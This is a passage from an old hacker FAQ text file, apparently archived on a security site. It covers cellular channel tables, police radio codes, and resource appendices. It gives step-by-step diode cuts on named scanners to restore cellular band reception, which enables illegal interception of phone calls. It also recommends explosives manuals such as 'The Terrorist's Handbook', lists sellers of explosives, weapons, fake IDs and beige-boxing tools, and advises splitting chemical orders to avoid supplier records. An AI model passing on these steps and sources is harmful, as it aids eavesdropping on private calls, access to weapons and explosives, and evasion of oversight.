880.020 880.050 880.080 880.110 880.140 880.170 880.200
835.020 835.050 835.080 835.110 835.140 835.170 835.200

2 355 356 357 358 359 360 361
880.650 880.680 880.710 880.740 880.770 880.800 880.830
835.650 835.680 835.710 835.740 835.770 835.800 835.830

3 376 377 378 379 380 381 382
881.280 881.310 881.340 881.370 881.400 881.430 881.460
836.280 836.310 836.340 836.370 836.400 836.430 836.460

4 397 398 399 400 401 402 403
881.910 881.940 881.970 882.000 882.030 882.060 882.090
836.910 836.940 836.970 837.000 837.030 837.060 837.090

5 418 419 420 421 422 423 424
882.540 882.570 882.600 882.630 882.660 882.690 882.720
837.540 837.570 837.600 837.630 837.660 837.690 837.720

6 439 440 441 442 443 444 445
883.170 883.200 883.230 883.260 883.290 883.320 883.350
838.170 838.200 838.230 838.260 838.290 838.320 838.350

7 460 461 462 463 464 465 466
883.800 883.830 883.860 883.890 883.920 883.950 883.980
838.800 838.830 838.860 838.890 838.920 838.950 838.980

8 481 482 483 484 485 486 487
884.430 884.460 884.490 884.520 884.550 884.580 884.610
839.430 839.460 839.490 839.520 839.550 839.580 839.610

9 502 503 504 505 506 507 508
885.060 885.090 885.120 885.150 885.180 885.210 885.240
840.060 840.090 840.120 840.150 840.180 840.210 840.240

10 523 524 525 526 527 528 529
885.690 885.720 885.750 885.780 885.810 885.840 885.870
840.690 840.720 840.750 840.780 840.810 840.840 840.870

11 544 545 546 547 548 549 550
886.320 886.350 886.380 886.410 886.440 886.470 886.500
841.320 841.350 841.380 841.410 841.440 841.470 841.500

12 565 566 567 568 569 570 571
886.950 886.980 887.010 887.040 887.070 887.100 887.130
841.950 841.980 842.010 842.040 842.070 842.100 842.130

13 586 587 588 589 590 591 592
887.580 887.610 887.640 887.670 887.700 887.730 887.760
842.580 842.610 842.640 842.670 842.700 842.730 842.760

14 607 608 609 610 611 612 613
888.210 888.240 888.270 888.300 888.330 888.360 888.390
843.210 843.240 843.270 843.300 843.330 843.360 843.390

15 628 629 630 631 632 633 634
888.840 888.870 888.900 888.930 888.960 888.990 889.020
843.840 843.870 843.900 843.930 843.960 843.990 844.020

16 649 650 651 652 653 654 655
889.470 889.500 889.530 889.560 889.590 889.620 889.650
844.470 844.500 844.530 844.560 844.590 844.620 844.650


Cell #
Chan 8 9 10 11 12 13 14

1 341 342 343 344 345 346 347
880.230 880.260 880.290 880.320 880.350 880.380 880.410
835.230 835.260 835.290 835.320 835.350 835.380 835.410

2 362 363 364 365 366 367 368
880.860 880.890 880.920 880.950 880.980 881.010 881.040
835.860 835.890 835.920 835.950 835.980 836.010 836.040

3 383 384 385 386 387 388 389
881.490 881.520 881.550 881.580 881.610 881.640 881.670
836.490 836.520 836.550 836.580 836.610 836.640 836.670

4 404 405 406 407 408 409 410
882.120 882.150 882.180 882.210 882.240 882.270 882.300
837.120 837.150 837.180 837.210 837.240 837.270 837.300

5 425 426 427 428 429 430 431
882.750 882.780 882.810 882.840 882.870 882.900 882.930
837.750 837.780 837.810 837.840 837.870 837.900 837.930

6 446 447 448 449 450 451 452
883.380 883.410 883.440 883.470 883.500 883.530 883.560
838.380 838.410 838.440 838.470 838.500 838.530 838.560

7 467 468 469 470 471 472 473
884.010 884.040 884.070 884.100 884.130 884.160 884.190
839.010 839.040 839.070 839.100 839.130 839.160 839.190

8 488 489 490 491 492 493 494
884.640 884.670 884.700 884.730 884.760 884.790 884.820
839.640 839.670 839.700 839.730 839.760 839.790 839.820

9 509 510 511 512 513 514 515
885.270 885.300 885.330 885.360 885.390 885.420 885.450
840.270 840.300 840.330 840.360 840.390 840.420 840.450

10 530 531 532 533 534 535 536
885.900 885.930 885.960 885.990 886.020 886.050 886.080
840.900 840.930 840.960 840.990 841.020 841.050 841.080

11 551 552 553 554 555 556 557
886.530 886.560 886.590 886.620 886.650 886.680 886.710
841.530 841.560 841.590 841.620 841.650 841.680 841.710

12 572 573 574 575 576 577 578
887.160 887.190 887.220 887.250 887.280 887.310 887.340
842.160 842.190 842.220 842.250 842.280 842.310 842.340

13 593 594 595 596 597 598 599
887.790 887.820 887.850 887.880 887.910 887.940 887.970
842.790 842.820 842.850 842.880 842.910 842.940 842.970

14 614 615 616 617 618 619 620
888.420 888.450 888.480 888.510 888.540 888.570 888.600
843.420 843.450 843.480 843.510 843.540 843.570 843.600

15 635 636 637 638 639 640 641
889.050 889.080 889.110 889.140 889.170 889.200 889.230
844.050 844.080 844.110 844.140 844.170 844.200 844.230

16 656 657 658 659 660 661 662
889.680 889.710 889.740 889.770 889.800 889.830 889.860
844.680 844.710 844.740 844.770 844.800 844.830 844.860


Cell #
Chan 15 16 17 18 19 20 21

1 348 349 350 351 352 353 354
880.440 880.470 880.500 880.530 880.560 880.590 880.620
835.440 835.470 835.500 835.530 835.560 835.590 835.620

2 369 370 371 372 373 374 375
881.070 881.100 881.130 881.160 881.190 881.220 881.250
836.070 836.100 836.130 836.160 836.190 836.220 836.250

3 390 391 392 393 394 395 396
881.700 881.730 881.760 881.790 881.820 881.850 881.880
836.700 836.730 836.760 836.790 836.820 836.850 836.880

4 411 412 413 414 415 416 417
882.330 882.360 882.390 882.420 882.450 882.480 882.510
837.330 837.360 837.390 837.420 837.450 837.480 837.510

5 432 433 434 435 436 437 438
882.960 882.990 883.020 883.050 883.080 883.110 883.140
837.960 837.990 838.020 838.050 838.080 838.110 838.140

6 453 454 455 456 457 458 459
883.590 883.620 883.650 883.680 883.710 883.740 883.770
838.590 838.620 838.650 838.680 838.710 838.740 838.770

7 474 475 476 477 478 479 480
884.220 884.250 884.280 884.310 884.340 884.370 884.400
839.220 839.250 839.280 839.310 839.340 839.370 839.400

8 495 496 497 498 499 500 501
884.850 884.880 884.910 884.940 884.970 885.000 885.030
839.850 839.880 839.910 839.940 839.970 840.000 840.030

9 516 517 518 519 520 521 522
885.480 885.510 885.540 885.570 885.600 885.630 885.660
840.480 840.510 840.540 840.570 840.600 840.630 840.660

10 537 538 539 540 541 542 543
886.110 886.140 886.170 886.200 886.230 886.260 886.290
841.110 841.140 841.170 841.200 841.230 841.260 841.290

11 558 559 560 561 562 563 564
886.740 886.770 886.800 886.830 886.860 886.890 886.920
841.740 841.770 841.800 841.830 841.860 841.890 841.920

12 579 580 581 582 583 584 585
887.370 887.400 887.430 887.460 887.490 887.520 887.550
842.370 842.400 842.430 842.460 842.490 842.520 842.550

13 600 601 602 603 604 605 606
888.000 888.030 888.060 888.090 888.120 888.150 888.180
843.000 843.030 843.060 843.090 843.120 843.150 843.180

14 621 622 623 624 625 626 627
888.630 888.660 888.690 888.720 888.750 888.780 888.810
843.630 843.660 843.690 843.720 843.750 843.780 843.810

15 642 643 644 645 646 647 648
889.260 889.290 889.320 889.350 889.380 889.410 889.440
844.260 844.290 844.320 844.350 844.380 844.410 844.440

16 663 664 665 666
889.890 889.920 889.950 889.980
844.890 844.920 844.950 844.980

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR?
1. Buy an older scanner before they stopped them from receiving the
necessary freqs (look at garage sales)
2. For a Realistic PRO-2004 open the case and cut one leg of D-513.
3. For a Realistic PRO-2005 open the case and cut one leg of D-502.
4. For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz
and 869-896 MHz.
5. Get the "Scanner Modification Handbook" volumes I and II by Bill
Cheek from Comunications Electronics Inc. (313)996-8888.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC?

There are books available at Radio Shack for about $8 that list all
of the freqs used by area.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN?

10-00 Series Code

10-0 Exercise great caution.
10-1 Reception is poor.
10-2 Reception is good.
10-3 Stop transmitting.
10-4 Message received.
10-5 Relay message.
10-6 Change channel.
10-7 Out of service/unavailable for assignment.
10-7A Out of service at home.
10-7B Out of service - personal.
10-7OD Out of service - off duty
10-8 In service/available for assignment.
10-9 Repeat last transmission.
10-10 Off duty.
10-10A Off duty at home.
10-11 Identify this frequency.
10-12 Visitors are present (be discrete).
10-13 Advise weather and road conditions.
10-14 Citizen holding suspect.
10-15 Prisoner in custody.
10-16 Pick up prisoner.
10-17 Request for gasoline.
10-18 Equipment exchange.
10-19 Return/returning to the station.
10-20 Location?
10-21 Telephone:______
10-21A Advise home that I will return at ______.
10-21B Phone your home
10-21R Phone radio dispatch
10-22 Disregard the last assignment.
10-22C Leave area if all secure; responsible person/owner is
enroute.
10-23 Standby.
10-24 Request car-to-car transmission.
10-25 Do you have contact with _______?
10-26 Clear.
10-27 Driver's license check.
10-28 Vehicle registration request.
10-29 Check wants/warrants.[vehicle] (PIN,SVS)
10-29a Check wants/warrants [subject] (PIN)
10-29c Check complete [subject]
10-29f The subject is wanted for a felony.
10-29h Caution - severe hazard potential.
10-29r Check wants/record [subject (PIN,CJIC)
10-29m The subject is wanted for a misdemeanor.
10-29v The vehicle is wanted in connection with a possible crime.
10-30 Does not conform to regulations.
10-32 Drowning.
10-33 Alarm sounding.
10-34 Assist at office.
10-35 Time check.
10-36 Confidential information.
10-37 Identify the operator.
10-39 Can ______ come to the radio?
10-40 Is ______ available for a telephone call?
10-42 Check on the welfare of/at ______.
10-43 Call a doctor.
10-45 What is the condition of the patient?
10-45A Condition of patient is good.
10-45B Condition of patient is serious.
10-45C Condition of patient is critical.
10-45D Patient is deceased.
10-46 Sick person [amb. enroute]
10-48 Ambulance transfer call
10-49 Proceed to/Enroute to ______.
10-50 Subject is under the influence of narcotics./Take a report.
10-51 Subject is drunk.
10-52 Resuscitator is needed.
10-53 Person down.
10-54 Possible dead body.
10-55 This is a coroner's case.
10-56 Suicide.
10-56A Suicide attempt.
10-57 Firearm discharged.
10-58 Garbage complaint
10-59 Security check./Malicious mischief
10-60 Lock out.
10-61 Miscellaneous public service.
10-62 Meet a citizen.
10-62A Take a report from a citizen.
10-62B Civil standby.
10-63 Prepare to copy.
10-64 Found property.
10-65 Missing person
10-66 Suspicious person.
10-67 Person calling for help.
10-68 Call for police made via telephone.
10-70 Prowler.
10-71 Shooting.
10-72 Knifing.
10-73 How do you receive?
10-79 Bomb threat.
10-80 Explosion.
10-86 Any traffic?
10-87 Meet the officer at ______.
10-88 Fill with the officer/Assume your post.
10-91 Animal.
10-91a Stray.
10-91b Noisy animal.
10-91c Injured animal.
10-91d Dead animal.
10-91e Animal bite.
10-91g Animal pickup.
10-91h Stray horse
10-91j Pickup/collect ______.
10-91L Leash law violation.
10-91V Vicious animal.
10-95 Out of vehicle-pedestrian/ Requesting an I.D./Tech unit.
10-96 Out of vehicle-ped. send backup
10-97 Arrived at the scene.
10-98 Available for assignment.
10-99 Open police garage door
10-100 Civil disturbance - Mutual aid standby.
10-101 Civil disturbance - Mutual aid request.


11-00 Series Code

11-10 Take a report.
11-24 Abandoned automobile.
11-25 Traffic hazard.
11-26 Abandoned bicycle.
11-27 10-27 with the driver being held.
11-28 10-28 with the driver being held.
11-40 Advise if an ambulance is needed.
11-41 An ambulance is needed.
11-42 No ambulance is needed.
11-48 Furnish transportation.
11-51 Escort.
11-52 Funeral detail.
11-54 Suspicious vehicle.
11-55 Officer is being followed by automobile.
11-56 Officer is being followed by auto containing dangerous
persons.
11-57 An unidentified auto appeared at the scene of the assignment.
11-58 Radio traffic is being monitored. Phone all non-routine
messages.
11-59 Give intensive attention to high hazard/business areas.
11-60 Attack in a high hazard area.
11-65 Signal light is out.
11-66 Defective traffic light.
11-78 Aircraft accident.
11-79 Accident - ambulance has been sent.
11-80 Accident - major injuries.
11-81 Accident - minor injuries.
11-82 Accident - no injuries.
11-83 Accident - no details.
11-84 Direct traffic.
11-85 Tow truck required.
11-94 Pedestrian stop.
11-95 Routine traffic stop.
11-96 Checking a suspicious vehicle.
11-97 Time/security check on patrol vehicles.
11-98 Meet: _______
11-99 Officer needs help.


900 Series Codes

904 Fire.
904A Automobile fire.
904B Building fire.
904G Grass fire.
909 Traffic problem; police needed.
910 Can handle this detail.
932 Turn on _______ mobile relay at _______.
933 Turn off mobile relay.
949 Burning inspection at _______.
950 Control burn in progress/about to begin/ended.
951 Need fire investigator.
952 Report on conditions.
953 Investigate smoke.
953A Investigate gas.
954 Off the air at the scene of the fire.
955 Fire is under control.
956 Assignment not finished.
957 Delayed response of __ minutes.
980 Restrict calls to emergency only.
981 Resume normal traffic.
1000 Plane crash
3000 Road block


Other Codes

Code 1 Do so at your convenience.
Code 2 Urgent.
Code 3 Emergency/lights and siren.
Code 4 No further assistance is needed.
Code 5 Stakeout.
Code 6 Responding from a long distance.
Code 7 Mealtime.
Code 8 Request cover/backup.
Code 9 Set up a roadblock.
Code 10 Bomb threat
Code 12 Notify news media
Code 20 Officer needs assistance
Code 22 Restricted radio traffic
Code 30 Officer needs HELP - EMERGENCY!
Code 33 Mobile emergency - clear this radio channel.
Code 43 TAC forces committed.
AID Public Safety Assistance


Phonetic Alphabet

A Adam N Nora
B Boy O Ocean
C Charles P Paul
D David Q Queen
E Edward R Robert
F Frank S Sam
G George T Tom
H Henry U Union
I Ida V Victor
J John W William
K King X X-ray
L Lincoln Y Yellow
M Mary Z Zebra

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION?

Vehicles

Item Example

1. Color Red over black
2. Year 1984
3. Make Cadillac
4. Body Two door
5. License plate 6VWH926 (given phonetically!)


Persons
1. Name
2. Race
3. Sex
4. Age
5. Height
6. Weight
7. Hair color
8. Eye color
9. Complexion
10. Physical marks, tattoos, scars, limps, etc.
11. Clothing (head to feet)
a. Hat
b. Shirt;tie
c. Coat
d. Trousers
e. Socks
f. Shoes

=====================================================================
Appendix A. FTP sites with useful info:

ftp.eff.org
wiretap.spies.com
hpacv.com (mail postmaster@hpacv.com for info first)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cpsr.org /cpsr
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/
black.ox.ac.uk Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov \ These two sites will give you
martini.eecs.umich.edu 3000 / whatever info you need about any city.


=====================================================================
Apendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

=====================================================================
Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
comp.virus
comp.unix.admin
comp.protocols.tcp-ip

Also try IRC #hack. *** WARNING: May be lame at times!!! ***

=====================================================================
Appendix D. Publications and Zines

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2600:The Hacker Quarterly

a technical journal put out by hackers

mail: email:
2600 2600@well.sf.ca.us
PO Box 752 emmanuel@well.sf.ca.us
Middle Island, NY 11953
PH:516-751-2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PHRACK

The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WIRED

The magazine of the cyberculture.

Email: subscription@wired.com
info@wired.com

Or look for it on many newsstands.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fringe Ware Review

Email: fringeware@io.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Iron Feather Journal

Mail:
IFJ
PO Box 1905
Boulder CO 80306

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Groom Lake Desert Rat

Email: psychospy@aol.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Cybertek: The Cyberpunk Technical Journal

Mail:
Cybertek
PO Box 64
Brewster NY 10509

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

LineNoiz

Email: dodger@fubar.bk.psu.edu
with
'subscription linenoiz <your.address>'
in the body of the message

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For more info on Zines then check out Factsheet Five and
Factsheet Five Electronic.

email: jerod23@well.sf.ca.us

=====================================================================
Appendix E. Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.

Davis, Tenney L.: "Chemistry of Powder and Explosives."

Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)

Russell: "Computer Security Basics"

Cornwall: "The (New) Hacker's Handbook"

"Cyberpunk" (forget the authors)

Kochan & Wood: "UNIX System Security"

Spafford & Garfinkel: " Practical UNIX Security"

Stohl, Clifford: "The Cuckoo's Egg"

Gasser, Morrie: "Building a Secure Computer System

THE RAINBOW SERIES
Can be obtained free from:
INFOSEC Awareness Office
National Computer Security Centre
9800 Savage Road
Fort George G. Meade, MD 20755-6000
Tel: 1-301-766-8729

"The Improvised Munitions Manual"

=====================================================================
Appendix F. Files and Papers.

Morris & Thompson: "Password Security, A Case History"

Curry: "Improving the Security of your UNIX System"
available via FTP as 'security-doc.tar.Z'

Klein: "Foiling the Cracker: A Survey of, and Improvements to,
Password Security."
Archie search for 'Foiling'

Cheswick: "The Design of a Secure Internet Gateway"
available from research.att.com
/dist/Secure_Internet_Gateway.ps

Cheswick: "An Evening with Berford: in which a Cracker is Lured,
Endured and Studied"
available from research.att.com
/dist/berford.ps

Bellovin89: "Security Problems in the TCP/IP Protocol Suite"
available from research.att.com
/dist/ipext.ps.Z

Bellovin91: "Limitations of the Kerberos Authentication System"
available from research.att.com

CERT: many various bits of info collected at cert.sei.cmu.edu

"Open Systems Security"
available from ajk.tele.fi(131.177.5.20)
/PublicDocuments

RFC-1244: "The Site Security Handbook"

"The Terrorist's Handbook"
how to make various explosive, propellants and
ignitors and also how to apply and use them


=====================================================================
Appendix G. Catalogs

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lockpicks
(from Belisarius)

You can get lockpicks from:

American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062

Lock Pick Sets
==============
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.

Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.

Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Explosives and other underground stuff

Loompanics is one of the major distributors of material relating to
the underground including explosives. You can get the catalog by
mailing:
Loompanics Unlim
P.O. Box 1197
Port Townsend, Wash 98368

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)


NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA 71135-5950
Phone: (318) 688-1365 FAX: (318) 688-1367

NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic surveillance stuff.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Weapons, explosives, survival gear.
(from CyberSorceror)

Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO 80439
(303) 277-0305

Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Paladin Press
PO Box 1307
Boulder, CO 80306

Enclose $2 for the publishers of the "Action Library".
Books on lockpicking, wiretapping, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

US Cavalry Catalog
Army field manuals, etc.
Interesting hardware, just about any military equipment (no firearms)

Their Customer Service Number is as follows:
1-800-333-5102
Their Hours are:
9am-9pm, Monday-Friday

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For beige boxing, data com cracking/patching tools try:
TIME MOTION TOOLS
12778 BROOKPRINTER PLACE
POWAY, CA 92064-6810

(619) 679-0303
(800) 779-8170

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age!
(from Neurophyre)

Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI 54220

Send a crisp $1 bill and a request for a catalog. Tip: Don't order
all your pyro stuff from here. They DO keep records. Be safe.


=====================================================================
Appendix H. PGP keys

None available currently ...

=====================================================================

*********************************************************************
************************ END OF THE HACK-FAQ! ***********************
*********************************************************************
***** Therefore, determine the enemy's plans and you will know ******
***** which strategy will be successful and which will not. ******
***** -- Sun Tzu, The Art of War ******
*********************************************************************
*********************************************************************





Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close